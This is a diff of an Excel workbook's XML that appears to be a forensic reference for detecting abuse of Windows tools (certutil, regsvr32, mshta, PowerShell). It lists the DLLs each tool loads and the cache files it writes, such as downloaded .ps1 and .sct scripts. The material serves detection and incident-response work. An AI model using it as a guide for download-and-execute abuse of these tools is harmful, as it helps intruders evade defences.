+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Web Transfer Protocols API - C:\Windows\System32\webio.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Windows HTTP Services - C:\Windows\System32\winhttp.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Certutil.exe writes to IE local cache:
+C:\Users\&lt;USER&gt;\AppData\Local\Microsoft\Windows\INetCache\IE\&lt;subdir&gt;
+Also writes to specified $outfile
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>e.g
+&lt;$outfile&gt;
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\1KNRXF1Z\test[1].ps1
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\1KNRXF1Z
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE
+C:\Users\Matthew Green\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\724952D26FF077BB6D9224E345256E93
+C:\Users\Matthew Green\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\724952D26FF077BB6D9224E345256E93</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Certutil.exe writes to IE local cache:
+C:\Users\&lt;USER&gt;\AppData\Local\Microsoft\Windows\INetCache\IE\&lt;subdir&gt;
+Also writes to specified $outfile
+e.g:
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>&lt;outfile&gt;
+C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\JIIN83V6\test[1].ps1
+C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE\JIIN83V6
+C:\Users\Matt.DFIR\AppData\Local\Microsoft\Windows\INetCache\IE
+C:\Windows\cerD555.tmp</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <t xml:space="preserve">Powershell.exe loads additional modules
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Regsvr32.exe loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll
+EDP util - C:\Windows\System32\edputil.dll
+Filter Library - C:\Windows\System32\fltLib.dll
+OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+Application Experience Program Cache - C:\Windows\System32\aepic.dll
+Cloud API user mode API - C:\Windows\System32\cldapi.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Group Policy Client API - C:\Windows\System32\gpapi.dll
+Software Licensing Client Dll - C:\Windows\System32\sppc.dll
+Software Licensing Client Dll - C:\Windows\System32\slc.dll
+Client Interface - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpClient.dll
+Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+IOfficeAntiVirus Module - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpOAV.dll
+Userenv - C:\Windows\System32\userenv.dll
+Anti-Malware Scan Interface - C:\Windows\System32\amsi.dll
+Windows Lockdown Policy - C:\Windows\System32\wldp.dll
+COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Windows ® Script Component Runtime - C:\Windows\System32\scrobj.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Data Protection API - C:\Windows\System32\dpapi.dll
+ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Windows HTTP Services - C:\Windows\System32\winhttp.dll
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Windows Socket 2.0 32-Bit DLL - C:\Windows\System32\ws2_32.dll
+Security Support Provider Interface - C:\Windows\System32\sspicli.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Internet Extensions for Win32 - C:\Windows\System32\wininet.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Isolation Library for Internet Explorer - C:\Windows\System32\msIso.dll
+Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
+Windows NT Image Helper - C:\Windows\System32\imagehlp.dll
+User Profile Basic API - C:\Windows\System32\profapi.dll
+Power Profile Helper DLL - C:\Windows\System32\powrprof.dll
+Microsoft WinRT Storage API - C:\Windows\System32\windows.storage.dll
+Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
+OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>regsvr32.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+e.g
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR\test[1].sct</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>Powershell.exe loads additional modules:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+DHCP Client Service - C:\Windows\System32\dhcpcsvc.dll
+DHCPv6 Client - C:\Windows\System32\dhcpcsvc6.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>DNS Client API DLL - C:\Windows\System32\dnsapi.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t xml:space="preserve">
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Confe64a9051#\ea931e4f660df414bb43822d70c9c9fb\System.Configuration.Install.ni.dll
+Microsoft Windows PowerShell Utility Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P521220ea#\3a5dc2caf55d763e630aa7e89c43dabb\Microsoft.PowerShell.Commands.Utility.ni.dll
+System.Configuration.dll - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\303d455e2eac7725610cd55c8170ba00\System.Configuration.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Transactions\1ed4ddbd8685d327bfdd39bab521366c\System.Transactions.ni.dll
+Microsoft Windows PowerShell Management Commands - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.P6f792626#\87dc8856a52ea55a6bf9698664257e01\Microsoft.PowerShell.Security.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Data\8d3ff0c32bb1ae109d1ac9f6c4caa4bf\System.Data.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Numerics\e7dc7f4504ef24ad3922aae3e9aa2d24\System.Numerics.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\2f52ca6330aa92554abf777e2b7d6783\System.Xml.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Dired13b18a9#\c3ffb5546a75f99a8d7293db710d1c24\System.DirectoryServices.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Management\a1f92e5e985f95bc5f212f8ff05c5c1a\System.Management.ni.dll
+cs - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Mf49f6405#\a12bb8857bac428f3891c2cad3b8bc14\Microsoft.Management.Infrastructure.ni.dll
+System.Management.Automation - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\7d16fda968d94b857be65dd8539a562a\System.Management.Automation.ni.dll
+Microsoft.PowerShell.ConsoleHost - C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pb378ec07#\803c6cc06ee5ddc93de3a601c7368bb9\Microsoft.PowerShell.ConsoleHost.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\2e6ad675e5f9e923284877dd42f58f75\System.Core.ni.dll
+.NET Framework - C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d41b66a8a5dde18b54c79b7b42b5c951\System.ni.dll</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>mshta loads:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>Direct3D Rasterizer - C:\Windows\System32\d3d10warp.dll
+Microsoft DirectX Typography Services - C:\Windows\System32\DWrite.dll
+Microsoft D2D Library - C:\Windows\System32\d2d1.dll
+Microsoft Line Services library file - C:\Windows\System32\msls31.dll
+Windows StateRepository Proxy/Stub Server - C:\Windows\System32\Windows.StateRepositoryPS.dll
+EDP util - C:\Windows\System32\edputil.dll
+Network Explorer - C:\Windows\System32\networkexplorer.dll
+Application Compatibility Client Library - C:\Windows\System32\apphelp.dll
+Filter Library - C:\Windows\System32\fltLib.dll
+Application Experience Program Cache - C:\Windows\System32\aepic.dll
+Cloud API user mode API - C:\Windows\System32\cldapi.dll
+OneCoreUAP Common Proxy Stub - C:\Windows\System32\OneCoreUAPCommonProxyStub.dll
+Microsoft Property System - C:\Windows\System32\propsys.dll
+Fusion 2.5 - C:\Windows\System32\sxs.dll
+Microsoft ® Script Runtime - C:\Windows\System32\scrrun.dll
+Multiple Provider Router DLL - C:\Windows\System32\mpr.dll
+Windows Script Host Runtime Library - C:\Windows\System32\wshom.ocx
+Version Checking and File Installation Libraries - C:\Windows\System32\version.dll
+IOfficeAntiVirus Module - C:\ProgramData\Microsoft\Windows Defender\Platform\4.12.17007.18022-0\MpOAV.dll
+Userenv - C:\Windows\System32\userenv.dll
+Anti-Malware Scan Interface - C:\Windows\System32\amsi.dll
+Microsoft ® JScript - C:\Windows\System32\jscript.dll
+Microsoft SChannel Provider - C:\Windows\System32\ncryptsslp.dll
+Crypto Network Related API - C:\Windows\System32\cryptnet.dll
+Microsoft ASN.1 API - C:\Windows\System32\ntasn1.dll
+Windows NCrypt Router - C:\Windows\System32\ncrypt.dll
+Microsoft Key Protection Provider - C:\Windows\System32\mskeyprotect.dll
+TLS / SSL Security Provider - C:\Windows\System32\schannel.dll
+FWP/IPsec User-Mode API - C:\Windows\System32\FWPUCLNT.DLL
+Microsoft ® JScript - C:\Windows\System32\jscript9.dll
+Resource Policy Client - C:\Windows\System32\ResourcePolicyClient.dll
+Active IMM Server DLL - C:\Windows\System32\msimtf.dll
+SRP APIs Dll - C:\Windows\System32\srpapi.dll
+Microsoft (R) HTML Viewer - C:\Windows\System32\mshtml.dll
+Remote Access AutoDial Helper - C:\Windows\System32\rasadhlp.dll
+DNS Client API DLL - C:\Windows\System32\dnsapi.dll
+Microsoft Enhanced Cryptographic Provider - C:\Windows\System32\rsaenh.dll
+Cryptographic Service Provider API - C:\Windows\System32\cryptsp.dll
+Data Protection API - C:\Windows\System32\dpapi.dll
+Network Store Information RPC interface - C:\Windows\System32\winnsi.dll
+NSI User-mode interface DLL - C:\Windows\System32\nsi.dll
+Microsoft Windows Sockets 2.0 Service Provider - C:\Windows\System32\mswsock.dll
+Windows HTTP Services - C:\Windows\System32\winhttp.dll
+IP Helper API - C:\Windows\System32\IPHLPAPI.DLL
+On Demand Connctiond Route Helper - C:\Windows\System32\OnDemandConnRouteHelper.dll
+Windows Socket 2.0 32-Bit DLL - C:\Windows\System32\ws2_32.dll
+Internet Extensions for Win32 - C:\Windows\System32\wininet.dll
+Windows ® Script Component Runtime - C:\Windows\System32\scrobj.dll
+Resource Manager Client - C:\Windows\System32\rmclient.dll
+twinapi.appcore - C:\Windows\System32\twinapi.appcore.dll
+Microsoft DirectComposition Library - C:\Windows\System32\dcomp.dll
+Direct3D 11 Runtime - C:\Windows\System32\d3d11.dll
+Data exchange - C:\Windows\System32\DataExchange.dll
+Windows Base Types DLL - C:\Windows\System32\WinTypes.dll
+Windows NT MARTA provider - C:\Windows\System32\ntmarta.dll
+Microsoft CoreMessaging Dll - C:\Windows\System32\CoreMessaging.dll
+Microsoft Core UI Components Dll - C:\Windows\System32\CoreUIComponents.dll
+"TextInputFramework.DYNLINK" - C:\Windows\System32\TextInputFramework.dll
+DirectX Graphics Infrastructure - C:\Windows\System32\dxgi.dll
+Microsoft Trust Verification APIs - C:\Windows\System32\wintrust.dll
+Windows Lockdown Policy - C:\Windows\System32\wldp.dll
+Configuration Manager DLL - C:\Windows\System32\cfgmgr32.dll
+Windows Shell Common Dll - C:\Windows\System32\shell32.dll
+Security Support Provider Interface - C:\Windows\System32\sspicli.dll
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcrypt.dll
+ASN.1 Runtime APIs - C:\Windows\System32\msasn1.dll
+Crypto API32 - C:\Windows\System32\crypt32.dll
+Common Controls Library - C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.16299.248_none_15ced204935f55d7\comctl32.dll
+COM+ Configuration Catalog - C:\Windows\System32\clbcatq.dll
+Microsoft Desktop Window Manager API - C:\Windows\System32\dwmapi.dll
+OLEAUT32.DLL - C:\Windows\System32\oleaut32.dll
+MSCTF Server DLL - C:\Windows\System32\msctf.dll
+Microsoft UxTheme Library - C:\Windows\System32\uxtheme.dll
+Microsoft OLE for Windows - C:\Windows\System32\ole32.dll
+Isolation Library for Internet Explorer - C:\Windows\System32\msIso.dll
+Base cryptographic API DLL - C:\Windows\System32\cryptbase.dll
+Windows NT Image Helper - C:\Windows\System32\imagehlp.dll
+User Profile Basic API - C:\Windows\System32\profapi.dll
+Power Profile Helper DLL - C:\Windows\System32\powrprof.dll
+AppModel API Host - C:\Windows\System32\kernel.appcore.dll
+Shell Light-weight Utility Library - C:\Windows\System32\shlwapi.dll
+Microsoft WinRT Storage API - C:\Windows\System32\windows.storage.dll
+OLE32 Extensions for Win32 - C:\Windows\System32\urlmon.dll
+Multi-User Windows IMM32 API Client DLL - C:\Windows\System32\imm32.dll
+SHCORE - C:\Windows\System32\SHCore.dll
+Run time utility for Internet Explorer - C:\Windows\System32\iertutil.dll
+Microsoft COM for Windows - C:\Windows\System32\combase.dll
+Win32u - C:\Windows\System32\win32u.dll
+Multi-User Windows USER API Client DLL - C:\Windows\System32\user32.dll
+Microsoft® C Runtime Library - C:\Windows\System32\ucrtbase.dll
+Microsoft® C Runtime Library - C:\Windows\System32\msvcp_win.dll
+GDI Client DLL - C:\Windows\System32\gdi32full.dll
+GDI Client DLL - C:\Windows\System32\gdi32.dll
+Microsoft (R) HTML Application host - C:\Windows\System32\mshta.exe
+Windows Cryptographic Primitives Library - C:\Windows\System32\bcryptprimitives.dll
+Remote Procedure Call Runtime - C:\Windows\System32\rpcrt4.dll
+Host for SCM/SDDL/LSA Lookup APIs - C:\Windows\System32\sechost.dll
+Advanced Windows 32 Base API - C:\Windows\System32\advapi32.dll
+Windows NT CRT DLL - C:\Windows\System32\msvcrt.dll
+Windows NT BASE API Client DLL - C:\Windows\System32\KernelBase.dll</t>
+    </r>
+  </si>
+  <si>
+    <r>
+      <rPr>
+        <b/>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t>mshta.exe writes:</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="12"/>
+        <color theme="1"/>
+        <rFont val="Calibri"/>
+        <family val="2"/>
+        <scheme val="minor"/>
+      </rPr>
+      <t xml:space="preserve">
+C:\Users\&lt;USER&gt;\AppData\*\INetCache\*
+e.g
+</t>
+    </r>
+    <r>
+      <rPr>
+        <sz val="10"/>
+        <color theme="1"/>
+        <rFont val="Calibri (Body)_x0000_"/>
+      </rPr>
+      <t>C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR\mshta[1].sct
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE\JTJM57VR
+C:\Users\Matthew Green\AppData\Local\Microsoft\Windows\INetCache\IE</t>
     </r>
   </si>
 </sst>
@@ -6561,10 +9474,12 @@
       <scheme val="minor"/>
     </font>
     <font>
+      <b/>
       <sz val="10"/>
       <color theme="1"/>
       <name val="Calibri"/>
       <family val="2"/>
+      <scheme val="minor"/>
     </font>
   </fonts>
   <fills count="35">
@@ -6760,7 +9675,7 @@
       </patternFill>
     </fill>
   </fills>
-  <borders count="12">
+  <borders count="11">
     <border>
       <left/>
       <right/>
@@ -6890,19 +9805,6 @@
       </bottom>
       <diagonal/>
     </border>
-    <border>
-      <left style="thin">
-        <color indexed="64"/>
-      </left>
-      <right style="thin">
-        <color indexed="64"/>
-      </right>
-      <top/>
-      <bottom style="thin">
-        <color indexed="64"/>
-      </bottom>
-      <diagonal/>
-    </border>
   </borders>
   <cellStyleXfs count="42">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0"/>
@@ -6948,7 +9850,7 @@
     <xf numFmtId="0" fontId="1" fillId="31" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
     <xf numFmtId="0" fontId="1" fillId="32" borderId="0" applyNumberFormat="0" applyBorder="0" applyAlignment="0" applyProtection="0"/>
   </cellStyleXfs>
-  <cellXfs count="57">
+  <cellXfs count="59">
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0"/>
     <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyAlignment="1">
       <alignment horizontal="left" vertical="top"/>
@@ -6998,9 +9900,6 @@
       <alignment vertical="top" wrapText="1"/>
     </xf>
     <xf numFmtId="0" fontId="0" fillId="34" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1"/>
-    <xf numFmtId="0" fontId="0" fillId="34" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment vertical="top"/>
-    </xf>
     <xf numFmtId="0" fontId="16" fillId="0" borderId="0" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left"/>
     </xf>
@@ -7083,9 +9982,6 @@
     <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyBorder="1" applyAlignment="1">
       <alignment vertical="top"/>
     </xf>
-    <xf numFmtId="0" fontId="16" fillId="33" borderId="11" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
-      <alignment horizontal="left" vertical="top"/>
-    </xf>
     <xf numFmtId="2" fontId="0" fillId="0" borderId="10" xfId="0" applyNumberFormat="1" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment vertical="top" wrapText="1"/>
     </xf>
@@ -7098,11 +9994,23 @@
     <xf numFmtId="0" fontId="0" fillId="34" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="16" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="top" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="0" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
       <alignment wrapText="1"/>
     </xf>
-    <xf numFmtId="0" fontId="0" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+    <xf numFmtId="0" fontId="16" fillId="0" borderId="10" xfId="0" applyFont="1" applyBorder="1" applyAlignment="1">
       <alignment horizontal="left" vertical="top" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment vertical="top" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="32" fillId="0" borderId="0" xfId="0" applyFont="1" applyAlignment="1">
+      <alignment horizontal="left" vertical="top" wrapText="1"/>
+    </xf>
+    <xf numFmtId="0" fontId="16" fillId="0" borderId="10" xfId="0" applyFont="1" applyFill="1" applyBorder="1" applyAlignment="1">
+      <alignment horizontal="left"/>
     </xf>
   </cellXfs>
   <cellStyles count="42">
@@ -7463,7 +10371,7 @@
   <dimension ref="A1:A11"/>
   <sheetViews>
     <sheetView workbookViewId="0">
-      <selection activeCell="A4" sqref="A4"/>
+      <selection activeCell="A3" sqref="A3"/>
     </sheetView>
   </sheetViews>
   <sheetFormatPr baseColWidth="10" defaultRowHeight="16"/>
@@ -7475,22 +10383,22 @@
   <sheetData>
     <row r="1" spans="1:1" ht="152">
